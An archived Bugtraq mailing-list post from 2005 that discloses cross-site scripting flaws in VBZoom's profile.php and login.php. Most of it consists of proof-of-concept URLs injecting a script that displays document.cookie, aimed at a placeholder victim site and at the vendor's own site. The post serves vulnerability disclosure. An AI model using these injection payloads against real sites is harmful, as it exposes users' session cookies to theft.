NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 2005-08

VBZoom Cross Site Scripting Vulnerabilities

almasterhotmail.com
Date: Fri Jul 29 2005 - 06:38:35 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi All.

VBzoom

PROPLEM >>>THERE IS Cross site scripting IN FILE NAMED profile.php & login.php

EXPLIOT >>> http://www.victim.com/vbzoom/profile.php?UserID=1&UserName=<br><script>alert(document.cookie);</script>

EXPLIOT >>> http://Victim.com/vbzoom/login.php?UserID='<br><script>alert(document.cookie);</script>

EXAMPLE >>>http://www.vbzoom.com/vz/profile.php?UserID=1&UserName=<br><script>alert(document.cookie);</script>

EXAMPLE >>>http://www.vbzoom.com/vz/login.php?UserID='<br><script>alert(document.cookie);</script>

DISCOVERED BY >> aLMaSTeR [at] HotMail [dot] com
GREETS >>> FOR S4a.cc

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]